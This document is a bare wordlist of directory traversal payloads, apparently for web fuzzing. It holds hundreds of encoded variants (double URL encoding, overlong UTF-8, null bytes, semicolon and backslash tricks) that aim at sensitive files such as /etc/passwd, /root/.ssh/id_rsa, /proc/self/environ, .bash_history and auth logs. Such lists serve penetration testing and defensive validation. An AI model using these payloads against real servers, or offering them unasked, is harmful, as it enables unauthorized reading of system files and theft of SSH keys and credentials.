.
..
..?
.?.
?..
?.?
??.
.??
???
??../../
?../..//
?/../
?/./../
.?./
.?./..//
..;?/../
..;/ 
..;/;/..;/
..;/;/../
..;/?../../
..;/..;/
..;/..;/ 
..;/..;/?/
..;/..;/..;/
..;/..;/..;/ 
..;/..?/../
..;/../
..;/..%2f..;/..%2fetc/passwd
..;/..%3f/../
..??/../
..??//../
..?/../
..?/..//
......//////../
.....////../
...../////../
..../
..../?/
..../?/../
..../..../
....//
....//../
..../// 
....////../
.../.../
.../../
..././
../
../;?/
../;?/../
../;?#/
../;/../
../?../
../?/
../?/../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../etc/passwd;/.
../../../../../../etc/passwd?.
../../../../../../etc/passwd%00
../../../../../../proc/self/environ?.
../../../../../../windows/win.ini?.
../../../../etc/passwd
../../../../home/user/.bash_history
../../../../proc/self/cmdline
../../../../proc/self/environ
../../../../proc/self/maps
../../../../proc/self/status
../../../../root/.ssh/id_rsa
../../../../var/log/auth.log
../../../../var/log/nginx/access.log
../../../../windows/win.ini
../../../etc/passwd
../../%00/
../../etc/passwd
../../etc/passwd/.
../../etc/passwd/..
.././../
../././../
..//
..//./../
..///
..///../
../%00/
../etc/passwd
../etc/passwd%00
../etc/passwd%00.jpg
../etc/passwd%00.png
..\ 
..\..\ 
..\..\..\ 
..\..\..\..\ 
..\..\..\..\windows\win.ini
..\..\..\etc\passwd
..\..\etc\passwd
..\etc\passwd
..%00/
..%09/
..%0a/
..%0d/
..%252f
..%252f;/../
..%252f?/../
..%252f..
..%252f..%252f
..%252f..%252f..%252f
..%252f..%252f..%252fproc/self/environ
..%252f..%252fetc/passwd
..%252f%252e%252e%252f
..%253f/../
..%255c
..%255c?/..%255c
..%255c..%255c
..%255c..%255cwindows\win.ini
..%2f
..%2f;/../
..%2f;%2f../
..%2f??/../
..%2f?/
..%2f?/../
..%2f..
..%2f../
..%2f..%2f
..%2f..%2f..%2f
..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2fetc/passwd
..%2f..%2f..%2fproc/self/environ
..%2f..%2fetc/passwd
..%2f%2e%2e%2f
..%3f../
..%3f..%252f
..%3f..%2f
..%3f/../
..%5c
..%5c?/
..%5c?/..%5c
..%5c..
..%5c..%5c
..%5c..%5c..%5c
..%5c..%5cwindows/win.ini
..%5c..%5cwindows\win.ini
..%c0%af
..%c0%af/etc/passwd
..%c1%1c
..%c1%9c
..%c1%9c/etc/passwd
..%ef%bc%8f
..%u002f..%u002fetc/passwd
..%u2215
..%u2216
./
./.././../
.%2e/
.%2e/../
.%2e/.%2e/
.%2e/.%2e/.%2e/
.%2e%2f../
.php;.jpg/../../etc/passwd
.php/../../etc/passwd
.php%00.jpg
.php%2500.jpg
/;/
/.
/.;/
/.;/.;/../
/.;/../
/..;/../..;/../etc/passwd
/..;%2f
/..;%5c
/..?/
/..?/../
/..?//../
/.../../
/../
/../../
/../../../
/../..//../..//etc/passwd
/..//
/..\
/..\/..\/etc/passwd
/..%23/
/..%252f
/..%252f../
/..%2f
/..%2f../
/..%2f..%2f
/..%2f..%2f..%2f..%2fproc/self/environ
/..%3f/
/..%3f/../
/..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%ff/..%ff/etc/passwd
/./
/.%2e/
/.%2e/?/
/.%2e/?/../
/.%2e/.%2e/
/.%2e/.%2e/.%2e/
//...//
//../
//..//
///../
/\../
/%252e%252e?/
/%252e%252e/
/%252e%252e/?/../
/%252e%252e//%252e%252e/
/%252e%252e%252f
/%2e/
/%2e%2e?/
/%2e%2e/
/%2e%2e/?/../
/%2e%2e//%2e%2e/
/%2e%2e/%2e%2e/
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e%2f
/%2e%2e%2f/
/%2e%2e%5c
/%2f%2e%2e/
/%2f%2e%2e/%2f
/js../..//etc/passwd
/safe/path/../../../etc/passwd
/safe/path//%2e%2e//etc/passwd
/safe/path/%2e%2e/%2e%2e/etc/passwd
/static../etc/passwd
\../
\..\
\\../
%252e%252e/
%252e%252e/%252e%252e/
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%255c
%255c%255c..%255c
%2e./../
%2e%2e./
%2e%2e./../
%2e%2e/
%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/
%2e%2e%00/
%2e%2e%255c
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%5c
%2f%2e%2e%2f
%5c%2e%2e%5c
%c0%ae%c0%ae/
%c1%ae%c1%ae/
%ef%bc%8e%ef%bc%8e/